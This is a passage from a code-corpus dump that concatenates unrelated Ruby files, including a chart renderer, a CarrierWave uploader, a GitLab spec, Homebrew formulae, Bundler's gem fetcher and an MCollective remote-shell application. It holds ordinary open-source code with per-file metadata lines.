value.flatten( @xml )
end
end
# -----------------------------------------------------------------------
# renders chart to xml
def render_xml
@xml = Builder::XmlMarkup.new
@xml.gauge do
@xml.license( @license ) unless @license.nil?
render_extra_components
render_components
end
@xml.to_s.gsub( /<to_s\/>/, '' )
end
# -----------------------------------------------------------------------
# Parse erb template if any
def erb_render( yml )
# b = binding
ERB.new( yml ).result binding
end
# -----------------------------------------------------------------------
# Load yaml file associated with class if any
def inflate( clazz, designs_dir, design )
class_name = underscore( demodulize( clazz.to_s ) )
begin
file_name = "#{designs_dir}/#{design}.yml"
Ziya.logger.debug ">>> ZiYa attempt to load design file '#{file_name}"
return nil unless File.exists?( file_name )
yml = IO.read( file_name )
# Ziya.logger.debug ">>> Unprocessed yaml...\n#{yml}\n"
processed = erb_render( yml )
# Ziya.logger.debug ">>> Processed yaml...\n#{processed}"
load = YAML::load( processed )
Ziya.logger.info ">>> ZiYa successfully loaded design file `#{file_name}"
return load
rescue SystemCallError => boom
Ziya.logger.error boom
rescue => bang
Ziya.logger.error ">>> ZiYa -- Error encountered loading design file `#{file_name} -- #{bang}"
bang.backtrace.each { |l| Ziya.logger.error( l ) }
end
nil
end
end
end | 35.651163 | 107 | 0.466243 |
b95ed7de29efd567308fae6314725c6ba5d3cdf2 | 1,530 | # encoding: utf-8
class PictureUploader < CarrierWave::Uploader::Base
# Include RMagick or MiniMagick support:
# include CarrierWave::RMagick
# include CarrierWave::MiniMagick
# Choose what kind of storage to use for this uploader:
storage :file
# storage :fog
# Override the directory where uploaded files will be stored.
# This is a sensible default for uploaders that are meant to be mounted:
def store_dir
"uploads/#{model.class.to_s.underscore}/#{mounted_as}/#{model.id}"
end
# Provide a default URL as a default if there hasn't been a file uploaded:
# def default_url
# # For Rails 3.1+ asset pipeline compatibility:
# # ActionController::Base.helpers.asset_path("fallback/" + [version_name, "default.png"].compact.join('_'))
#
# "/images/fallback/" + [version_name, "default.png"].compact.join('_')
# end
# Process files as they are uploaded:
# process :scale => [200, 300]
#
# def scale(width, height)
# # do something
# end
# Create different versions of your uploaded files:
# version :thumb do
# process :resize_to_fit => [50, 50]
# end
# Add a white list of extensions which are allowed to be uploaded.
# For images you might use something like this:
# 添加一个白名单,指定允许上传的图像类型
def extension_white_list
%w(jpg jpeg gif png)
end
# Override the filename of the uploaded files:
# Avoid using model.id or version_name here, see uploader/store.rb for details.
# def filename
# "something.jpg" if original_filename
# end
end
| 28.867925 | 112 | 0.699346 |
f880984a85da31676578a91267dc81ff3cc31ccb | 3,572 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Groups::Analytics::CoverageReportsController do
let_it_be(:user) { create(:user) }
let_it_be(:group) { create(:group) }
let_it_be(:project) { create(:project, namespace: group) }
let_it_be(:ref_path) { 'refs/heads/master' }
let_it_be(:first_coverage) { create_daily_coverage('rspec', project, 79.0, '2020-03-09', group) }
let_it_be(:last_coverage) { create_daily_coverage('karma', project, 95.0, '2020-03-10', group) }
let_it_be(:valid_request_params) do
{
group_id: group.name,
start_date: '2020-03-01',
end_date: '2020-03-31',
ref_path: ref_path,
format: :csv
}
end
before do
sign_in(user)
end
context 'without permissions' do
describe 'GET index' do
it 'responds 403' do
get :index, params: valid_request_params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
context 'with permissions' do
before do
group.add_owner(user)
end
context 'without a license' do
before do
stub_licensed_features(group_coverage_reports: false)
end
describe 'GET index' do
it 'responds 403 because the feature is not licensed' do
get :index, params: valid_request_params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
describe 'GET index' do
before do
stub_licensed_features(group_coverage_reports: true)
end
it 'responds 200 with CSV coverage data', :snowplow do
get :index, params: valid_request_params
expect_snowplow_event(
category: described_class.name,
action: 'download_code_coverage_csv',
label: 'group_id',
value: group.id
)
expect(response).to have_gitlab_http_status(:ok)
expect(csv_response).to eq([
%w[date group_name project_name coverage],
[last_coverage.date.to_s, last_coverage.group_name, project.name, last_coverage.data['coverage'].to_s],
[first_coverage.date.to_s, first_coverage.group_name, project.name, first_coverage.data['coverage'].to_s]
])
end
context 'when ref_path is nil' do
let(:ref_path) { nil }
it 'responds HTTP 200' do
get :index, params: valid_request_params
expect(response).to have_gitlab_http_status(:ok)
expect(csv_response.size).to eq(3)
end
end
it 'executes the same number of queries regardless of the number of records returned' do
control = ActiveRecord::QueryRecorder.new do
get :index, params: valid_request_params
end
expect(CSV.parse(response.body).length).to eq(3)
create_daily_coverage('rspec', project, 79.0, '2020-03-10', group)
expect { get :index, params: valid_request_params }.not_to exceed_query_limit(control)
expect(csv_response.length).to eq(4)
end
context 'with an invalid format' do
it 'responds 404' do
get :index, params: valid_request_params.merge(format: :json)
expect(response).to have_gitlab_http_status(:not_found)
end
end
end
end
private
def create_daily_coverage(group_name, project, coverage, date, group = nil)
create(
:ci_daily_build_group_report_result,
project: project,
ref_path: ref_path,
group_name: group_name,
data: { 'coverage' => coverage },
date: date,
group: group
)
end
end
| 27.689922 | 115 | 0.650616 |
7a8e33fad7852d2b7dbd9b918c24f91be729fa48 | 643 |
# encoding: UTF-8
module Axlsx
# An override content part. These parts are automatically created by for you based on the content of your package.
class Override < AbstractContentType
# Serialization node name for this object
NODE_NAME = 'Override'
# The name and location of the part.
# @return [String]
attr_reader :part_name
alias :PartName :part_name
# The name and location of the part.
def part_name=(v) Axlsx::validate_string v; @part_name = v end
alias :PartName= :part_name=
# Serializes this object to xml
def to_xml_string(str = '')
super(NODE_NAME, str)
end
end
end
| 24.730769 | 116 | 0.692068 |
6a5c3ace72a8865d189dc2f67fce77f2cae2b339 | 5,545 | require 'formula'
class Grass < Formula
homepage 'http://grass.osgeo.org/'
url 'http://grass.osgeo.org/grass64/source/grass-6.4.2.tar.gz'
sha1 '74481611573677d90ae0cd446c04a3895e232004'
head 'https://svn.osgeo.org/grass/grass/trunk'
option "without-gui", "Build without WxPython interface. Command line tools still available."
depends_on "pkg-config" => :build
depends_on :python
depends_on "gettext"
depends_on "readline"
depends_on "gdal"
depends_on "libtiff"
depends_on "unixodbc"
depends_on "fftw"
depends_on 'wxmac' => :recommended # prefer over OS X's version because of 64bit
depends_on :postgresql => :optional
depends_on :mysql => :optional
depends_on "cairo" if MacOS.version == :leopard
depends_on :x11 # needs to find at least X11/include/GL/gl.h
# Patches that files are not installed outside of the prefix.
def patches; DATA; end
fails_with :clang do
cause "Multiple build failures while compiling GRASS tools."
end
def headless?
# The GRASS GUI is based on WxPython. Unfortunately, Lion does not include
# this module so we have to drop it.
build.include? 'without-gui' or MacOS.version == :lion
end
def install
readline = Formula.factory('readline')
gettext = Formula.factory('gettext')
args = [
"--disable-debug", "--disable-dependency-tracking",
"--enable-largefile",
"--enable-shared",
"--with-cxx",
"--without-motif",
"--with-python",
"--with-blas",
"--with-lapack",
"--with-sqlite",
"--with-odbc",
"--with-geos=#{Formula.factory('geos').opt_prefix}/bin/geos-config",
"--with-png",
"--with-readline-includes=#{readline.opt_prefix}/include",
"--with-readline-libs=#{readline.opt_prefix}/lib",
"--with-readline",
"--with-nls-includes=#{gettext.opt_prefix}/include",
"--with-nls-libs=#{gettext.opt_prefix}/lib",
"--with-nls",
"--with-freetype",
"--without-tcltk" # Disabled due to compatibility issues with OS X Tcl/Tk
]
unless MacOS::CLT.installed?
# On Xcode-only systems (without the CLT), we have to help:
args << "--with-macosx-sdk=#{MacOS.sdk_path}"
args << "--with-opengl-includes=#{MacOS.sdk_path}/System/Library/Frameworks/OpenGL.framework/Headers"
end
if headless? or build.without? 'wxmac'
args << "--without-wxwidgets"
else
args << "--with-wxwidgets=#{Formula.factory('wxmac').opt_prefix}/bin/wx-config"
end
if MacOS.prefer_64_bit?
args << "--enable-64bit"
args << "--with-macosx-archs=x86_64"
else
args << "--with-macosx-archs=i386"
end
# Deal with Cairo support
if MacOS.version == :leopard
cairo = Formula.factory('cairo')
args << "--with-cairo-includes=#{cairo.include}/cairo"
args << "--with-cairo-libs=#{cairo.lib}"
else
args << "--with-cairo-includes=#{MacOS::X11.include} #{MacOS::X11.include}/cairo"
end
args << "--with-cairo"
# Database support
if build.with? "postgres"
args << "--with-postgres"
end
if build.with? "mysql"
mysql = Formula.factory('mysql')
args << "--with-mysql-includes=#{mysql.include + 'mysql'}"
args << "--with-mysql-libs=#{mysql.lib + 'mysql'}"
args << "--with-mysql"
end
system "./configure", "--prefix=#{prefix}", *args
system "make" # make and make install must be separate steps.
system "make install"
end
def caveats
if headless?
<<-EOS.undent
This build of GRASS has been compiled without the WxPython GUI. This is
done by default on Lion because there is no stable build of WxPython
available to compile against.
The command line tools remain fully functional.
EOS
elsif MacOS.version < :lion
# On Lion or above, we are very happy with our brewed wxwidgets.
<<-EOS.undent
GRASS is currently in a transition period with respect to GUI support.
The old Tcl/Tk GUI cannot be built using the version of Tcl/Tk provided
by OS X. This has the unfortunate consquence of disabling the NVIZ
visualization system. A keg-only Tcl/Tk brew or some deep hackery of
the GRASS source may be possible ways to get around this around this.
Tcl/Tk will eventually be depreciated in GRASS 7 and this version has
been built to support the newer wxPython based GUI. However, there is
a problem as wxWidgets does not compile as a 64 bit library on OS X
which affects Snow Leopard users. In order to remedy this, the GRASS
startup script:
#{prefix}/grass-#{version}/etc/Init.sh
has been modified to use the OS X system Python and to start it in 32 bit mode.
EOS
end
end
end
__END__
Remove two lines of the Makefile that try to install stuff to
/Library/Documentation---which is outside of the prefix and usually fails due
to permissions issues.
diff --git a/Makefile b/Makefile
index f1edea6..be404b0 100644
--- a/Makefile
+++ b/Makefile
@@ -304,8 +304,6 @@ ifeq ($(strip $(MINGW)),)
-tar cBf - gem/skeleton | (cd ${INST_DIR}/etc ; tar xBf - ) 2>/dev/null
-${INSTALL} gem/gem$(GRASS_VERSION_MAJOR)$(GRASS_VERSION_MINOR) ${BINDIR} 2>/dev/null
endif
- @# enable OSX Help Viewer
- @if [ "`cat include/Make/Platform.make | grep -i '^ARCH.*darwin'`" ] ; then /bin/ln -sfh "${INST_DIR}/docs/html" /Library/Documentation/Help/GRASS-${GRASS_VERSION_MAJOR}.${GRASS_VERSION_MINOR} ; fi
install-strip: FORCE
| 34.018405 | 199 | 0.656988 |
bbab55b6d2aafc1c9b3f1d256b8be7a6b9ab71f6 | 2,000 | # Puma can serve each request in a thread from an internal thread pool.
# The `threads` method setting takes two numbers a minimum and maximum.
# Any libraries that use thread pools should be configured to match
# the maximum value specified for Puma. Default is set to 5 threads for minimum
# and maximum, this matches the default thread size of Active Record.
#
threads_count = ENV.fetch('RAILS_MAX_THREADS', 2).to_i
threads threads_count, threads_count
# Specifies the `port` that Puma will listen on to receive requests, default is 3000.
#
port ENV.fetch('PORT', 3000), '0.0.0.0'
# Specifies the `environment` that Puma will run in.
#
environment ENV.fetch('RAILS_ENV', 'development')
# Specifies the number of `workers` to boot in clustered mode.
# Workers are forked webserver processes. If using threads and workers together
# the concurrency of the application would be max `threads` * `workers`.
# Workers do not work on JRuby or Windows (both of which do not support
# processes).
#
# workers ENV.fetch('WEB_CONCURRENCY') { 2 }
# Use the `preload_app!` method when specifying a `workers` number.
# This directive tells Puma to first boot the application and load code
# before forking the application. This takes advantage of Copy On Write
# process behavior so workers use less memory. If you use this option
# you need to make sure to reconnect any threads in the `on_worker_boot`
# block.
#
# preload_app!
# The code in the `on_worker_boot` will be called if you are using
# clustered mode by specifying a number of `workers`. After each worker
# process is booted this block will be run, if you are using `preload_app!`
# option you will want to use this block to reconnect to any threads
# or connections that may have been created at application boot, Ruby
# cannot share connections between processes.
#
# on_worker_boot do
# ActiveRecord::Base.establish_connection if defined?(ActiveRecord)
# end
# Allow puma to be restarted by `rails restart` command.
plugin :tmp_restart
| 41.666667 | 85 | 0.768 |
01f9d7c63f8bf4f02185e6636ab7ec7163697037 | 1,107 | require 'rspec'
require 'bosh/dev/ruby_version'
namespace :fly do
# bundle exec rake fly:unit
desc 'Fly unit specs'
task :unit do
execute('test-unit')
end
# bundle exec rake fly:integration
desc 'Fly integration specs'
task :integration do
env(DB: (ENV['DB'] || 'postgresql'))
execute('test-integration', '-p')
end
# bundle exec rake fly:run["pwd ; ls -al"]
task :run, [:command] do |_, args|
env(COMMAND: %Q|\"#{args[:command]}\"|)
execute('run', '-p')
end
private
def concourse_target
"-t #{ENV['CONCOURSE_TARGET']}" if ENV.has_key?('CONCOURSE_TARGET')
end
def env(modifications = {})
@env ||= {
RUBY_VERSION: ENV['RUBY_VERSION'] || Bosh::Dev::RubyVersion.release_version
}
@env.merge!(modifications) if modifications
@env.to_a.map { |pair| pair.join('=') }.join(' ')
end
def execute(task, command_options = nil)
sh("#{env} fly #{concourse_target} execute #{command_options} -x -c ci/tasks/#{task}.yml -i bosh-src=$PWD")
end
end
desc 'Fly unit and integration specs'
task :fly => %w(fly:unit fly:integration)
| 24.065217 | 111 | 0.64047 |
e84aa620baabab8e02b146f8bd4b94d26c371664 | 704 | # frozen_string_literal: true
require "spec_helper"
RSpec.describe "ActiveRecord integration using AttrFilters::ActiveModel", if: active_record? do
context "attributes lazy loading" do
it "should success add filter to an attribute" do
ActiveRecord::Base.establish_connection(
adapter: "sqlite3",
database: ":memory:"
)
ActiveRecord::Base.connection.execute(%(CREATE TABLE IF NOT EXISTS users (name TEXT, age INT);))
class User < ActiveRecord::Base
include AttrFilters::ActiveModel
filters :name, trim: true
end
user = User.new(name: " Mike Dou")
user.valid?
expect(user.name).to eq("Mike Dou")
end
end
end
| 27.076923 | 102 | 0.669034 |
083c7a5a7db7969e19ea93cddfce324e6fd039b6 | 719 | # coding: utf-8
Gem::Specification.new do |spec|
spec.name = "jekyll-athena"
spec.version = "0.0.2"
spec.authors = ["broccolini"]
spec.email = ["[email protected]"]
spec.summary = %q{A simple and elegant theme for Jekyll and GitHub Pages.}
spec.homepage = "https://audiosutta.github.io/athena"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0").select do |f|
f.match(%r{^(assets|_(includes|layouts|sass)/|(LICENSE|README)((\.(txt|md|markdown)|$)))}i)
end
spec.add_development_dependency "jekyll", "~> 3.2"
spec.add_development_dependency "bundler", "~> 1.12"
spec.add_development_dependency "rake", "~> 10.0"
end
| 34.238095 | 95 | 0.623088 |
627d7d4adea49b3452aec0f32518969ab3420dbf | 11,242 | require 'bundler/vendored_persistent'
module Bundler
# Handles all the fetching with the rubygems server
class Fetcher
# This error is raised if the API returns a 413 (only printed in verbose)
class FallbackError < HTTPError; end
# This is the error raised if OpenSSL fails the cert verification
class CertificateFailureError < HTTPError
def initialize(remote_uri)
super "Could not verify the SSL certificate for #{remote_uri}.\nThere" \
" is a chance you are experiencing a man-in-the-middle attack, but" \
" most likely your system doesn't have the CA certificates needed" \
" for verification. For information about OpenSSL certificates, see" \
" bit.ly/ruby-ssl. To connect without using SSL, edit your Gemfile" \
" sources and change 'https' to 'http'."
end
end
# This is the error raised when a source is HTTPS and OpenSSL didn't load
class SSLError < HTTPError
def initialize(msg = nil)
super msg || "Could not load OpenSSL.\n" \
"You must recompile Ruby with OpenSSL support or change the sources in your " \
"Gemfile from 'https' to 'http'. Instructions for compiling with OpenSSL " \
"using RVM are available at rvm.io/packages/openssl."
end
end
class << self
attr_accessor :disable_endpoint, :api_timeout, :redirect_limit, :max_retries
@@spec_fetch_map ||= {}
def fetch(spec)
spec, uri = @@spec_fetch_map[spec.full_name]
if spec
path = download_gem_from_uri(spec, uri)
s = Bundler.rubygems.spec_from_gem(path, Bundler.settings["trust-policy"])
spec.__swap__(s)
end
end
def download_gem_from_uri(spec, uri)
spec.fetch_platform
download_path = Bundler.requires_sudo? ? Bundler.tmp : Bundler.rubygems.gem_dir
gem_path = "#{Bundler.rubygems.gem_dir}/cache/#{spec.full_name}.gem"
FileUtils.mkdir_p("#{download_path}/cache")
Bundler.rubygems.download_gem(spec, uri, download_path)
if Bundler.requires_sudo?
Bundler.mkdir_p "#{Bundler.rubygems.gem_dir}/cache"
Bundler.sudo "mv #{Bundler.tmp}/cache/#{spec.full_name}.gem #{gem_path}"
end
gem_path
end
end
def initialize(remote_uri)
# How many redirects to allew in one request
@redirect_limit = 5
# How long to wait for each gemcutter API call
@api_timeout = 10
# How many retries for the gemcutter API call
@max_retries = 3
@remote_uri = remote_uri
@public_uri = remote_uri.dup
@public_uri.user, @public_uri.password = nil, nil # don't print these
if defined?(Net::HTTP::Persistent)
@connection = Net::HTTP::Persistent.new 'bundler', :ENV
@connection.verify_mode = (Bundler.settings[:ssl_verify_mode] ||
OpenSSL::SSL::VERIFY_PEER)
@connection.cert_store = bundler_cert_store
else
raise SSLError if @remote_uri.scheme == "https"
@connection = Net::HTTP.new(@remote_uri.host, @remote_uri.port)
end
@connection.read_timeout = @api_timeout
Socket.do_not_reverse_lookup = true
end
# fetch a gem specification
def fetch_spec(spec)
spec = spec - [nil, 'ruby', '']
spec_file_name = "#{spec.join '-'}.gemspec"
uri = URI.parse("#{@remote_uri}#{Gem::MARSHAL_SPEC_DIR}#{spec_file_name}.rz")
if uri.scheme == 'file'
Bundler.load_marshal Gem.inflate(Gem.read_binary(uri.path))
elsif cached_spec_path = gemspec_cached_path(spec_file_name)
Bundler.load_gemspec(cached_spec_path)
else
Bundler.load_marshal Gem.inflate(fetch(uri))
end
rescue MarshalError => e
raise HTTPError, "Gemspec #{spec} contained invalid data.\n" \
"Your network or your gem server is probably having issues right now."
end
# cached gem specification path, if one exists
def gemspec_cached_path spec_file_name
paths = Bundler.rubygems.spec_cache_dirs.map { |dir| File.join(dir, spec_file_name) }
paths = paths.select {|path| File.file? path }
paths.first
end
# return the specs in the bundler format as an index
def specs(gem_names, source)
index = Index.new
use_full_source_index = !gem_names || @remote_uri.scheme == "file" || Bundler::Fetcher.disable_endpoint
if gem_names && use_api
Bundler.ui.info "Fetching gem metadata from #{@public_uri}", Bundler.ui.debug?
specs = fetch_remote_specs(gem_names)
# new line now that the dots are over
Bundler.ui.info "" if specs && !Bundler.ui.debug?
end
if specs.nil?
# API errors mean we should treat this as a non-API source
@use_api = false
Bundler.ui.info "Fetching source index from #{@public_uri}"
specs = fetch_all_remote_specs
end
specs[@remote_uri].each do |name, version, platform, dependencies|
next if name == 'bundler'
spec = nil
if dependencies
spec = EndpointSpecification.new(name, version, platform, dependencies)
else
spec = RemoteSpecification.new(name, version, platform, self)
end
spec.source = source
@@spec_fetch_map[spec.full_name] = [spec, @remote_uri]
index << spec
end
index
rescue CertificateFailureError => e
Bundler.ui.info "" if gem_names && use_api # newline after dots
raise e
end
# fetch index
def fetch_remote_specs(gem_names, full_dependency_list = [], last_spec_list = [])
query_list = gem_names - full_dependency_list
# only display the message on the first run
if Bundler.ui.debug?
Bundler.ui.debug "Query List: #{query_list.inspect}"
else
Bundler.ui.info ".", false
end
return {@remote_uri => last_spec_list} if query_list.empty?
spec_list, deps_list = fetch_dependency_remote_specs(query_list)
returned_gems = spec_list.map {|spec| spec.first }.uniq
fetch_remote_specs(deps_list, full_dependency_list + returned_gems, spec_list + last_spec_list)
# fall back to the legacy index in the following cases
# 1. Gemcutter Endpoint doesn't return a 200
# 2. Marshal blob doesn't load properly
# 3. One of the YAML gemspecs has the Syck::DefaultKey problem
rescue HTTPError, MarshalError, GemspecError => e
# new line now that the dots are over
Bundler.ui.info "" unless Bundler.ui.debug?
Bundler.ui.debug "Error during API request. #{e.class}: #{e.message}"
Bundler.ui.debug e.backtrace.join(" ")
@current_retries ||= 0
if @current_retries < @max_retries
@current_retries += 1
retry
end
@use_api = false
return nil
end
def use_api
return @use_api if defined?(@use_api)
if @remote_uri.scheme == "file" || Bundler::Fetcher.disable_endpoint
@use_api = false
elsif fetch(dependency_api_uri)
@use_api = true
end
rescue HTTPError
@use_api = false
end
def inspect
"#<#{self.class}:0x#{object_id} uri=#{@public_uri.to_s}>"
end
private
HTTP_ERRORS = [
Timeout::Error, EOFError, SocketError,
Errno::EINVAL, Errno::ECONNRESET, Errno::ETIMEDOUT, Errno::EAGAIN,
Net::HTTPBadResponse, Net::HTTPHeaderSyntaxError, Net::ProtocolError
]
HTTP_ERRORS << Net::HTTP::Persistent::Error if defined?(Net::HTTP::Persistent)
def fetch(uri, counter = 0)
raise HTTPError, "Too many redirects" if counter >= @redirect_limit
begin
Bundler.ui.debug "Fetching from: #{uri}"
req = Net::HTTP::Get.new uri.request_uri
req.basic_auth(uri.user, uri.password) if uri.user && uri.password
if defined?(Net::HTTP::Persistent)
response = @connection.request(uri, req)
else
response = @connection.request(req)
end
rescue OpenSSL::SSL::SSLError
raise CertificateFailureError.new(@public_uri)
rescue *HTTP_ERRORS
raise HTTPError, "Network error while fetching #{uri}"
end
case response
when Net::HTTPRedirection
Bundler.ui.debug("HTTP Redirection")
new_uri = URI.parse(response["location"])
if new_uri.host == uri.host
new_uri.user = uri.user
new_uri.password = uri.password
end
fetch(new_uri, counter + 1)
when Net::HTTPSuccess
Bundler.ui.debug("HTTP Success")
response.body
when Net::HTTPRequestEntityTooLarge
raise FallbackError, response.body
else
raise HTTPError, "#{response.class}: #{response.body}"
end
end
def dependency_api_uri(gem_names = [])
url = "#{@remote_uri}api/v1/dependencies"
url << "?gems=#{URI.encode(gem_names.join(","))}" if gem_names.any?
URI.parse(url)
end
# fetch from Gemcutter Dependency Endpoint API
def fetch_dependency_remote_specs(gem_names)
Bundler.ui.debug "Query Gemcutter Dependency Endpoint API: #{gem_names.join(',')}"
marshalled_deps = fetch dependency_api_uri(gem_names)
gem_list = Bundler.load_marshal(marshalled_deps)
deps_list = []
spec_list = gem_list.map do |s|
dependencies = s[:dependencies].map do |name, requirement|
dep = well_formed_dependency(name, requirement.split(", "))
deps_list << dep.name
dep
end
[s[:name], Gem::Version.new(s[:number]), s[:platform], dependencies]
end
[spec_list, deps_list.uniq]
end
# fetch from modern index: specs.4.8.gz
def fetch_all_remote_specs
Bundler.rubygems.sources = ["#{@remote_uri}"]
Bundler.rubygems.fetch_all_remote_specs
rescue Gem::RemoteFetcher::FetchError, OpenSSL::SSL::SSLError => e
if e.message.match("certificate verify failed")
raise CertificateFailureError.new(@public_uri)
else
Bundler.ui.trace e
raise HTTPError, "Could not fetch specs from #{@public_uri}"
end
end
def well_formed_dependency(name, *requirements)
Gem::Dependency.new(name, *requirements)
rescue ArgumentError => e
illformed = 'Ill-formed requirement ["#<YAML::Syck::DefaultKey'
raise e unless e.message.include?(illformed)
puts # we shouldn't print the error message on the "fetching info" status line
raise GemspecError,
"Unfortunately, the gem #{s[:name]} (#{s[:number]}) has an invalid " \
"gemspec. \nPlease ask the gem author to yank the bad version to fix " \
"this issue. For more information, see http://bit.ly/syck-defaultkey."
end
def bundler_cert_store
store = OpenSSL::X509::Store.new
if Bundler.settings[:ssl_ca_cert]
if File.directory? Bundler.settings[:ssl_ca_cert]
store.add_path Bundler.settings[:ssl_ca_cert]
else
store.add_file Bundler.settings[:ssl_ca_cert]
end
else
store.set_default_paths
certs = File.expand_path("../ssl_certs/*.pem", __FILE__)
Dir.glob(certs).each { |c| store.add_file c }
end
store
end
end
end
| 35.13125 | 109 | 0.648372 |
0867653140deb2e2759c9061de5a6a5fb3a77dc0 | 3,245 | # freeze_string_literals: true
# This file was generated by the `rspec --init` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
require 'webmock/rspec'
require_relative 'support/mock_server'
WebMock.disable_net_connect!(allow_localhost: true)
STOREDSAFE_SERVER = 'storedsafe.example.com'.freeze
ms = MockServer.new
RSpec.configure do |config|
config.before(:each, :type => :api) do
def response_from_file(file)
file = File.read("#{MockServer::FIXTURES}/#{file}")
JSON.parse(JSON.parse(file).to_json)
end
base_uri = STOREDSAFE_SERVER
stub_request(:any, /#{Regexp.quote(base_uri)}/).to_rack(ms)
end
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# This option will default to `:apply_to_host_groups` in RSpec 4 (and will
# have no way to turn it off -- the option exists only for backwards
# compatibility in RSpec 3). It causes shared context metadata to be
# inherited by the metadata hash of host groups and examples, rather than
# triggering implicit auto-inclusion in groups with matching metadata.
config.shared_context_metadata_behavior = :apply_to_host_groups
end
RSpec::Matchers.define :have_attr_accessor do |field|
match do |object_instance|
object_instance.respond_to?(field) &&
object_instance.respond_to?("#{field}=")
end
failure_message do |object_instance|
"expected attr_accessor for #{field} on #{object_instance}"
end
failure_message_when_negated do |object_instance|
"expected attr_accessor for #{field} not to be defined on \
#{object_instance}"
end
description do
"have an attr_accessor `#{field}`"
end
end
| 39.573171 | 80 | 0.738059 |
4a7af6189db62aa2512a428921a3ab7a490eb05a | 1,134 | Rails.application.config.before_configuration do
Raven.configuration.silence_ready = true
end
Rails.application.configure do
config.cache_classes = true
config.eager_load = false
config.public_file_server.enabled = true
config.public_file_server.headers = {
'Cache-Control' => 'public, max-age=3600'
}
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
config.action_dispatch.show_exceptions = false
config.action_controller.allow_forgery_protection = false
config.action_mailer.perform_caching = false
config.action_mailer.delivery_method = :test
config.active_support.deprecation = :stderr
# So we can always expect the same value in tests
config.action_mailer.default_url_options = { host: 'https://c100.justice.uk' }
# NB: Because of the way the form builder works, and hence the
# gov.uk elements formbuilder, exceptions will not be raised for
# missing translations of model attribute names. The form will
# get the constantized attribute name itself, in form labels.
config.action_view.raise_on_missing_translations = true
end
| 31.5 | 80 | 0.779541 |
396a5d3de80faedd877235e56fc7c63099a15e5f | 1,035 | class Luaver < Formula
desc "Manage and switch between versions of Lua, LuaJIT, and Luarocks"
homepage "https://github.com/DhavalKapil/luaver"
url "https://github.com/DhavalKapil/luaver/archive/v1.1.0.tar.gz"
sha256 "441b1b72818889593d15a035807c95321118ac34270da49cf8d5d64f5f2e486d"
license "MIT"
head "https://github.com/DhavalKapil/luaver.git"
bottle :unneeded
depends_on "wget"
def install
bin.install "luaver"
end
def caveats
<<~EOS
Add the following at the end of the correct file yourself:
if which luaver > /dev/null; then . `which luaver`; fi
EOS
end
test do
lua_versions = %w[5.3.3 5.2.4 5.1.5]
lua_versions.each do |v|
ENV.deparallelize { system ". #{bin}/luaver install #{v} < /dev/null" }
system ". #{bin}/luaver use #{v} && lua -v"
end
luajit_versions = %w[2.0.4]
luajit_versions.each do |v|
system ". #{bin}/luaver install-luajit #{v} < /dev/null"
system ". #{bin}/luaver use-luajit #{v} && luajit -v"
end
end
end
| 27.972973 | 77 | 0.655072 |
bf5176fcbf415c37a629f0eb344fc1d5212194de | 5,365 | require 'mcollective/application/shell/watcher'
class MCollective::Application::Shell < MCollective::Application
description 'Run shell commands'
usage <<-END_OF_USAGE
mco shell [OPTIONS] [FILTERS] <ACTION> [ARGS]
mco shell run [--tail] [COMMAND]
mco shell start [COMMAND]
mco shell watch [HANDLE]
mco shell list
mco shell kill [HANDLE]
END_OF_USAGE
option :tail,
:arguments => [ '--tail' ],
:description => 'Switch run to tail mode',
:type => :bool
def post_option_parser(configuration)
if ARGV.size < 1
raise "Please specify an action"
end
valid_actions = ['run', 'start', 'watch', 'list', 'kill' ]
action = ARGV.shift
unless valid_actions.include?(action)
raise 'Action has to be one of ' + valid_actions.join(', ')
end
configuration[:command] = action
end
def main
send("#{configuration[:command]}_command")
end
private
def run_command
command = ARGV.join(' ')
if configuration[:tail]
tail(command)
else
do_run(command)
end
end
def start_command
command = ARGV.join(' ')
client = rpcclient('shell')
responses = client.start(:command => command)
responses.sort_by! { |r| r[:sender] }
responses.each do |response|
if response[:statuscode] == 0
puts "#{response[:sender]}: #{response[:data][:handle]}"
else
puts "#{response[:sender]}: ERROR: #{response.inspect}"
end
end
printrpcstats :summarize => true, :caption => "Started command: #{command}"
end
def list_command
client = rpcclient('shell')
responses = client.list
responses.sort_by! { |r| r[:sender] }
responses.each do |response|
if response[:statuscode] == 0
next if response[:data][:jobs].empty?
puts "#{response[:sender]}:"
response[:data][:jobs].keys.sort.each do |handle|
puts " #{handle}"
if client.verbose
puts " command: #{response[:data][:jobs][handle][:command]}"
puts " status: #{response[:data][:jobs][handle][:status]}"
puts ""
end
end
end
end
printrpcstats :summarize => true, :caption => "Command list"
end
def watch_command
handles = ARGV
client = rpcclient('shell')
watchers = []
client.list.each do |response|
next if response[:statuscode] != 0
response[:data][:jobs].keys.each do |handle|
if handles.include?(handle)
watchers << Watcher.new(response[:sender], handle)
end
end
end
watch_these(client, watchers)
end
def kill_command
handle = ARGV.shift
client = rpcclient('shell')
client.kill(:handle => handle)
printrpcstats :summarize => true, :caption => "Command list"
end
def do_run(command)
client = rpcclient('shell')
responses = client.run(:command => command)
responses.sort_by! { |r| r[:sender] }
responses.each do |response|
if response[:statuscode] == 0
puts "#{response[:sender]}:"
puts response[:data][:stdout]
if response[:data][:stderr].size > 0
puts " STDERR:"
puts response[:data][:stderr]
end
if response[:data][:exitcode] != 0
